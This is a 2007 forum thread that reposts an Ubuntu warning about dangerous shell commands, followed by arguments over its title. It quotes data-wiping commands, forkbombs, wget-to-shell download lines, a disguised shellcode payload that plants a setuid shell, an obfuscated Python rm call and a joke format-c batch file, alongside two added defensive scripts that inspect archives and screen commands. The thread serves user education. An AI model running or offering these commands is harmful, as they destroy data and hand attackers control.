# Ubuntu users alert..malicious code on prowl..



## naveen_reloaded (Nov 28, 2007)

ATTENTION ALL USERS: Malicious Commands

I'd like to take a moment of your time to discuss a recent disturbing trend the staff has been noticing on the forums, and also take this as an opportunity to raise awareness of this situation through education.

We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer.

I'd just like to caution those thinking of doing this that UbuntuForums has a strict zero-tolerance policy when it comes to posting dangerous commands. If you post one of them, particularly in a support thread disguised as advice, expect to be instantly and permanently BANNED, at the account, e-mail, IP, or ISP level. I do not care about intent -- if you mean it as a joke, it is not funny. If you mean it as a lesson, go teach it somewhere else. This behavior is absolutely against the Forum Guidelines and Ubuntu Code of Conduct.

I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). No matter how hard we try to stay on top of all posts in realtime, we are not perfect.

Regards,

The UbuntuForums Staff.

As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.

Again, DANGEROUS COMMANDS -- look but DO NOT RUN.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.

Code:

rm -rf /
rm -rf .
rm -rf *

Reformat: Data on the device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Oftentimes this will clobber the filesystem and cause total loss of data:

Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until the system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.

In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiosity provokes)

Code:

:(){ :|:& };:

In Perl:

Code:

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory.

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source.

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust.

Code:

wget *some_place/some_file
sh ./some_file

Code:

wget *some_place/some_file -O- | sh

Compiling code: Someone gives you source code, then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

For more detail visit *www.ubuntuforums.org/announcement.php?a=54
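
The tarbomb and decompression bomb items above both come down to the same habit: look at what an archive would do before you let tar touch an existing directory. The script below is an added example, not code from the Ubuntu Forums announcement or from this thread. It reads only the tar headers (nothing is extracted, so it is safe to run on an untrusted download) and flags members that would scatter into the current directory, climb out of it, link outside it, overwrite a file you already have, or inflate far beyond the size of the download. The two sample archives are constructed in memory, and the limits (member count, declared size, compression ratio) are assumed policy values, not anything the announcement sets.

```python
"""Look inside a tar archive before extracting it into an existing directory.

Added example; not from the Ubuntu Forums announcement. Only headers are read.
The limits below are assumed policy values, not anything the announcement sets.
"""
import io
import posixpath
import tarfile

MAX_MEMBERS = 10_000      # assumed: more than this and nobody reviews it by hand
MAX_DECLARED = 1 << 30    # assumed: 1 GiB of declared uncompressed data
MAX_RATIO = 100.0         # assumed: declared bytes per downloaded byte


def escapes_target_dir(path: str) -> bool:
    """True if a member path would resolve outside the extraction directory."""
    if posixpath.isabs(path):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def inspect_tar(data: bytes, existing=frozenset()) -> dict:
    """Walk the headers of a (gz/bz2/xz or plain) tar and report findings.

    existing: names of files already present in the directory you intend to
    extract into; a member with the same name would silently overwrite them.
    Each finding is a (kind, detail) pair; an empty list means nothing fired.
    """
    findings = []
    top_level = set()
    members = declared = 0
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf:
            members += 1
            declared += m.size
            name = posixpath.normpath(m.name)
            top_level.add(name.split("/", 1)[0])
            if escapes_target_dir(m.name):
                findings.append(("traversal", m.name))
            if name in existing:
                findings.append(("overwrite", m.name))
            if m.issym():
                # symlink targets are relative to the member's own directory
                target = posixpath.join(posixpath.dirname(m.name), m.linkname)
                if escapes_target_dir(target):
                    findings.append(("symlink-out", f"{m.name} -> {m.linkname}"))
            elif m.islnk() and escapes_target_dir(m.linkname):
                findings.append(("hardlink-out", f"{m.name} -> {m.linkname}"))
            if m.isdev():
                findings.append(("device-node", m.name))
    if len(top_level) > 1:
        findings.append(("tarbomb", f"{len(top_level)} top-level entries: {sorted(top_level)}"))
    if members > MAX_MEMBERS:
        findings.append(("too-many-members", str(members)))
    if declared > MAX_DECLARED:
        findings.append(("too-big", str(declared)))
    ratio = declared / max(len(data), 1)
    if ratio > MAX_RATIO:
        findings.append(("bomb-ratio", f"{ratio:.0f}:1"))
    return {"members": members, "declared_bytes": declared, "ratio": ratio, "findings": findings}


def build_tar(entries, compress="gz") -> bytes:
    """Constructed sample archive for the demo. Each entry is (name, payload):
    bytes for a file, None for a directory, or ("symlink", target)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:" + compress) as tf:
        for name, payload in entries:
            info = tarfile.TarInfo(name)
            if payload is None:
                info.type = tarfile.DIRTYPE
                tf.addfile(info)
            elif isinstance(payload, tuple):
                info.type = tarfile.SYMTYPE
                info.linkname = payload[1]
                tf.addfile(info)
            else:
                info.size = len(payload)
                tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Constructed samples: a well-behaved source tarball and a hostile one.
BENIGN = build_tar([
    ("app-1.0", None),
    ("app-1.0/README", b"hello\n"),
    ("app-1.0/bin/run", b"#!/bin/sh\necho ok\n"),
])
HOSTILE = build_tar([
    ("README", b"looks harmless\n"),                     # scatters into the current directory
    (".bashrc", b"# attacker-controlled shell init\n"),  # guesses a file name you already have
    ("../.profile", b"# lands one directory up\n"),      # climbs out of the target directory
    ("lib/libc.so", ("symlink", "/etc/passwd")),         # link that points outside the tree
    ("big.bin", b"\0" * (8 << 20)),                      # 8 MiB of zeros: a few KiB on the wire
])

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("hostile", HOSTILE)):
        report = inspect_tar(blob, existing=frozenset({".bashrc"}))
        print(f"{label}: {len(blob)} bytes downloaded, {report['declared_bytes']} declared, "
              f"ratio {report['ratio']:.0f}:1")
        for kind, detail in report["findings"]:
            print(f"  {kind}: {detail}")
```

The check deliberately never calls extract; with the headers alone you already know whether the archive has a single top-level directory, whether any name starts with `/` or `../`, and how much data it claims to hold versus how much you downloaded. A single archive can of course pass all of these and still carry a malicious script, so this is a filter for the announcement's two archive tricks, not a substitute for trusting the source.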


----------



## praka123 (Nov 28, 2007)

LOL! Do you think this is news? What malicious code? I can't find any. Frustration of a virus-bloated Windows user!
Yes, indeed the command line is the powerhouse, and root/sudo is needed for something to "work". That's why there are no viruses; even if popularity increases for Linux, no viruses are able to destruct. Only worms which can corrupt ELF binaries exist.
And this sucks. You directly posted these commands for making some BAD news regarding Linux due to your winboyness. Mind edit/remove those commands. Post the basic things and the ubuntuforums.org link.
This is what is sarcastic about Vista boys: they want to defame Linux and FOSS, and of course Mac OS X BS!
*Warning: No Linux user, esp. Windows converts, try those commands!*


----------



## cool_techie_tvm (Nov 28, 2007)

Well thanks for the info, ubuntu n00b in here


----------



## naveen_reloaded (Nov 28, 2007)

I just wanted to warn others..
Why are you so irritated.. can't stand news against Ubuntu?


----------



## praka123 (Nov 28, 2007)

If I post a tip running "cmd" to delete your partition, do you feel for it?
There is nothing special in this case. This is made news thanks to the "Vista sucks" news circulating!


----------



## cool_techie_tvm (Nov 28, 2007)

Here is the official link to that announcement: *ubuntuforums.org/announcement.php?f=73

It's pretty much readable (no offense, naveen_reloaded).


----------



## ray|raven (Nov 28, 2007)

Malicious code on the prowl? Lolz.
Dude, you better change the title. It's very misleading.
That announcement in the Ubuntu forums was posted as a warning to newbies to stop them from running every darn command posted.

You talk as if there's a virus attacking every Ubuntu system out there.
It's like saying running format c:\ will erase everything on the C drive, so format is a malicious tool.

Oh, and please format that post.
It looks very bad.

Reported for misleading title/post.

Regards,
ray


----------



## praka123 (Nov 28, 2007)

Well said, rayraven! I got very angry at first when he posted this as some big fault! Well, for truth, the shell opens your Linux box, but posting this here as a vulnerability is irritating. I think he doesn't know what a shell means.

These are a few samples shown. And to prevent this FUD from a Vista boy, I urge users to read:


> *  One of the most common questions I hear new Linux users ask is "What program should I use for virus protection?" Many of them lose faith in me as a source of security information when I reply, "None." But you really don't need to fear malware on your new platform, thanks to the way Linux is built.
> Savvy Windows users have to watch their virus checkers as closely as the head nurse in the ICU keeps an eye on patient monitors. Often, the buzz in the Windows security world is about which protection-for-profit firm was the first to discover and offer protection for the malware du jour -- or should I say malware de l'heure? The only thing better than having backed the winning Super Bowl team come Monday morning at the office coffeepot is having the virus checker you use be the one winning the malware sweepstakes that weekend.
> 
> If a rogue program finds a crack in your Windows armor, paying $200 per infection to have your machine scrubbed and sanitized by the local goon^H^H^H^H geek squad not only helps to reinforce the notion that you have to have malware protection, but that it has to be the right protection, too. The malware firms are aware of this, and all of their advertising plays upon the insecurity fears of Windows users and the paranoia that results. Chronic exposure and vulnerability to malware has conditioned Windows users to accept this security tax.
> ...


 read the full article


----------



## infra_red_dude (Nov 28, 2007)

Hey guys, don't get mad at Naveen. He's only posted something which will be useful to all Linux noobs. Just that the title was misleading.

@Naveen
Thanks for posting it here. Kindly contact the mods and change the thread title to "Warning: Linux users, do not try these commands".


----------



## ray|raven (Nov 28, 2007)

@praka123
Nice link mate.A Must read for all new linux users.
Especially this part IMO.


> Linux users, like users on every operating system, must always be aware of security issues. They must act intelligently to keep their systems safe and secure. They should not run programs with root privileges when they are not required, and they should apply security patches regularly.
> 
> Misleading claims and false advertising by virus protection rackets to the contrary, you simply don't need antivirus products to keep your Linux box free of malware.



Regards,
ray


----------



## praka123 (Nov 28, 2007)

BTW, I am not a fan of "sudo" anyway. sudo is there for n00bish users; that's why Ubuntu uses it. I prefer a root login or "su -" anytime. It is better that Debian defaults to su.


----------



## naveen_reloaded (Nov 28, 2007)

Well, since I am posting from my mobile, anybody who is posting from a mobile knows how difficult it is to post a thread through a mobile.
Yes, the title may be misleading; why take it that way? Instead let it be a warning to all.
OK, if any mod is out there, please change the title.


I posted not to offend any Ubuntu user. I just posted so that not-so-techie Linux users can benefit.
Yes, Vista is good when compared to these horrifying commands that even regular users have fallen to.
In that manner Vista is very good.
At least we don't need to bother about the keyboard to make one thing work.

@infra red dude

Thanks for supporting and understanding what i did


----------



## Gigacore (Nov 28, 2007)

Offtopic: hey naveen, why are all your recent posts NARROW???


----------



## naveen_reloaded (Nov 28, 2007)

Because I am typing from mobile.. Opera Mini.
Don't know why.
Maybe it's causing it...
Don't know really.


----------



## Faun (Nov 28, 2007)

lol.. I thought it was something related to a security breach.

Already bookmarked it a week before.
Btw, you went to the Ubuntu forums just to post this here?

A lot of these are well known to Linux users.

The formatting of the text is screwed up.


----------



## praka123 (Nov 28, 2007)

^That's what I also thought! Pretty difficult to see it as a help for Ubuntu users! Rather, the title suggests that Ubuntu is like Vista, wtf.


----------



## NucleusKore (Nov 28, 2007)

Looks like I'm late.
Yes, the title is very misleading, please change it. And I think you can edit your post and fix the formatting from a PC; it's too longish.
As Praka et al. have pointed out, there are "dangerous" commands in Windows too.


----------



## naveen_reloaded (Nov 28, 2007)

It's not possible to change the title from the edit, guys. Only MODS can change it.


----------



## Ecko (Nov 28, 2007)

The following commands can cause massive damage to your Ubuntu operating system! Please DO NOT execute any of them, just read and learn!

CODE

sudo rm -rf / (This will delete all your files on your system) - Needs administrator rights!
sudo rm -rf . (This will delete the current directory you're in) - Needs administrator rights!
sudo rm -rf * (This will delete all the files in the current folder) - Needs administrator rights!
rm -rf * or rm -rf *.* (This will delete all the files in the current folder) - No administrator rights needed!
rm -rf ~ / & (This will destroy your home directory) - No administrator rights needed!


All the below commands will erase your hard drive!

CODE

sudo mkfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.ext3 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.bfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.cramfs (This will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.minix (This will format your hard drive) - Needs administrator rights!
sudo mkfs.msdos (This will format your hard drive) - Needs administrator rights!
sudo mkfs.reiserfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.vfat (This will format your hard drive) - Needs administrator rights!


The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!

CODE

sudo dd if=/dev/zero of=/dev/hda (VERY DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) (Needs administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)


WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb or any partition or hard drive you may have on your system!

Block device manipulation: Causes raw data to be written to a block device. Oftentimes this will clobber the filesystem and cause total loss of data!

CODE

any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates!

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON'T EXECUTE THEM!

CODE

:(){ :|:& };:


CODE

fork while fork


Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory!

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source!

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust!

CODE

wget *some_place/some_file
sh ./some_file

Example: wget *hax018r.org/malicious-script
sh ./malicious-script


or

CODE

wget *some_place/some_file -O- | sh

Example: wget *hax018r.org/malicious-script -O- | sh


WARNING: Remember that the above examples can have any name!

Compiling code: Someone gives you some source code, then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. Softpedia, SourceForge, Freshmeat, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:

CODE

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms. Watch out!

Here's another example of code that should definitely NOT be executed by anyone!

CODE

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'


Where "sn!.sg!+" is simply rm -rf * shifted a character up.

In conclusion, all new and inexperienced users who want to learn Ubuntu should start learning the above commands first and what they can do to your system.

Credits: Some of the above examples of malicious code were taken from the Ubuntu Forums announcement.
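
The commands in this post, and the shifted-string trick at the end, are the kind of thing you want to recognise on sight before pasting anything from a forum. The script below is an added example, not code from the announcement, from Ubuntu, or from anyone in this thread. It is a first-pass screen that runs over a pasted command or script and names which of the patterns quoted above it contains: `rm -rf` aimed at `/`, `.`, `*` or `~` with the flags in any order, any `mkfs`, `dd` or a shell redirect onto a disk device, the bash and Perl forkbombs, `wget ... | sh` and the two-line `wget` then `sh ./file` form. Because the announcement's own warning is that a dangerous command can always be disguised, the last two rules flag what you cannot read: an `os.system`/`eval`/`exec` call whose argument is built at runtime rather than written as a literal, and runs of `\xNN` escapes, i.e. machine code rather than "hex gibberish". The device-name patterns and the sample commands are constructed for the demo.

```python
"""First-pass screening of a pasted command or script for the patterns in this thread.

Added example; not from the announcement or from Ubuntu. The rule list is built
from the commands quoted in the thread and is deliberately NOT exhaustive.
"""
import re

DISK = r"/dev/(?:[sh]d[a-z]|nvme\d|mmcblk\d|xvd[a-z]|vd[a-z])"   # assumed device names

RULES = [
    # rm with -r and -f in any order, aimed at /, ., *, *.* or ~ (sudo or not)
    ("rm-wipes-tree",
     re.compile(r"\brm\s+(?:-\S+\s+)*-\S*[rR]\S*\s+(?:-\S+\s+)*(?:/|~|\*(?:\.\*)?|\.)(?=\s|$|;|&)", re.M)),
    # any mkfs / mkfs.<type>: replaces the named device with an empty filesystem
    ("mkfs-formats-device", re.compile(r"\bmkfs(?:\.\w+)?\b")),
    # dd writing to a whole disk or partition
    ("dd-to-block-device", re.compile(r"\bdd\b[^|;&\n]*\bof=" + DISK)),
    # shell redirection of anything onto a disk device
    ("redirect-to-block-device", re.compile(r">\s*" + DISK)),
    # a function that pipes itself into itself in the background: :(){ :|:& };:
    ("forkbomb", re.compile(r"(\w+|:)\(\)\s*\{\s*\1\s*\|\s*\1\s*&\s*\}")),
    ("forkbomb", re.compile(r"\bfork\s+while\s+fork\b")),
    # wget/curl output piped straight into an interpreter
    ("pipe-download-to-shell",
     re.compile(r"\b(?:wget|curl)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|da|z|k)?sh\b")),
    # os.system()/eval()/exec() whose argument is not a plain string literal
    ("constructed-command",
     re.compile(r"\b(?:os\.system|subprocess\.(?:call|run|Popen)|eval|exec)\(\s*(?!(?:\"[^\"]*\"|'[^']*')\s*\))")),
    # a run of \xNN escapes: machine code, not harmless "hex gibberish"
    ("embedded-shellcode", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")),
]
DOWNLOAD = re.compile(r"\b(?:wget|curl)\b")
RUN_LOCAL = re.compile(r"(?:^|;|&&|\|\|)\s*(?:sudo\s+)?(?:ba|da|z|k)?sh\s+\.?/\S+", re.M)


def screen(text: str) -> list:
    """Return the label of every rule that fires on the text, in rule order."""
    hits = []
    for label, rx in RULES:
        if rx.search(text) and label not in hits:
            hits.append(label)
    # the two-line "wget it, then sh ./it" pattern needs both halves present
    if DOWNLOAD.search(text) and RUN_LOCAL.search(text):
        hits.append("download-then-execute")
    return hits


# Constructed samples: the thread's commands plus two harmless look-alikes.
SAMPLES = [
    "sudo rm -rf /",
    "rm -rf ~ / &",
    "rm -rf ./build && make",                # harmless: a relative path, not the tree root
    "sudo mkfs.ext3 /dev/sda1",
    "sudo dd if=/dev/zero of=/dev/hda",
    "cat firmware.bin > /dev/sdb",
    "ls -la /dev/sda",                       # harmless: reads, writes nothing
    ":(){ :|:& };:",
    "perl -e 'fork while fork'",
    "wget *some_place/some_file -O- | sh",
    "wget *some_place/some_file\nsh ./some_file",
    """python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'""",
    r'char esp[] = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68";',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s.splitlines()[0]:45s} -> {screen(s) or 'nothing flagged'}")
```

A clean result from this screen means only that none of the quoted patterns appeared literally; it is the "constructed-command" and "embedded-shellcode" labels that carry the real lesson from the thread, because a hit there tells you the author went out of their way to stop you reading the command, and the right response is the one the announcement gives: wait for more opinions or have it explained against the manpages before you run it.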


----------



## cool_techie_tvm (Nov 28, 2007)

Guess what, this has even made it to the front page of digg !! 

*www.digg.com/linux_unix/Ubuntu_Malicious_Command_Warning


----------



## Faun (Nov 28, 2007)

cool_techie_tvm said:

> Guess what, this has even made it to the front page of digg !!
> 
> *www.digg.com/linux_unix/Ubuntu_Malicious_Command_Warning



lol...digg it man


----------



## Sykora (Nov 28, 2007)

@praka et al.: Why is everyone bashing naveen? IMO this is one of the most important pieces of advice one can give to a new Linux user. It tells them that Linux is secure enough that the only way the system will crash is if you do something stupid -- the point remains that it can still be crashed, so watch out.

Good post, but I'm surprised it took so long for people to start (both posting malicious code, and noticing that it was being posted).


----------



## NucleusKore (Nov 28, 2007)

@Sykora.... look at the thread title:
"Ubuntu users alert..malicious code on prowl.."
I was expecting a vulnerability, as in a virus, when I opened this thread.
Yes, the commands are dangerous, but it could have been presented more accurately. It's more like: don't openly trust anyone you meet on any forum. No offence meant to any fresh stock here, but it's a precaution you take on ANY forum, not necessarily computing.

Also note there is a difference between dangerous and malicious. Format in Windows can be a dangerous command if you do not know what you are doing, BUT IT IS NOT MALICIOUS.


----------



## preshit.net (Nov 28, 2007)

Absolutely. Although I really appreciate the OP for the article/post, the title chosen is totally misleading.

No MODS reading this ehh ?

Btw, praka, Nice article there


----------



## Sykora (Nov 28, 2007)

@NucleusKore : So if I gave you the source code for a virus, it would no longer be malicious?

I admit the title is _slightly_ off, but certainly not so much to get offended or irritated. At least the title is controversial enough to get everyone to take a look at the thread


----------



## naveen_reloaded (Nov 28, 2007)

^Well said.
At first I too thought I had created the worst title.
To say the truth, I just copied and pasted just like any other news being submitted here. And I am doing that from mobile; it's kinda difficult.
Kindly understand. I just want people to know about these commands so that they won't fall for any naughty work of hackers through mail and other stuff. Yes, I do agree that Linux has got the least or no viruses... but let me ask: how many of the Linux users are well versed with all these commands?
I don't think so many will know.

In that case, at least many will come to know what these codes are and how they can be harmful.

Others who are irritated and well-versed people of Ubuntu can go to another thread and reply...
I had no intention of flaming Ubuntu users. I don't know why prak is so irritated... don't worry, dude, many things like this are yet to hit the net once your Ubuntu becomes popular.

Until then your so-called Vista fanboy like me can at least have happy days not worrying about how to remember the idiotic commands... which I think only devs should know and bang their heads with... not me..
I didn't start it. You did.
Thanks anyway..


----------



## NucleusKore (Nov 29, 2007)

Sykora said:

> @NucleusKore : So if I gave you the source code for a virus, it would no longer be malicious?



Is format in windows cli a virus?

I think I made myself quite clear earlier


----------



## Faun (Nov 29, 2007)

I can make a virus, it's damn easy:
1) create a .bat file
2) name it XXX.mpg.bat
3) write inside: format c:
4) echo u r a dumb addict

Done, man, yeah it was that easy.. lol
wait:
soon a patch will be coming from MS to correct this malicious code


----------



## NucleusKore (Nov 29, 2007)

Yes it better come soon


----------



## praka123 (Nov 29, 2007)

Lol! :d @t159


----------

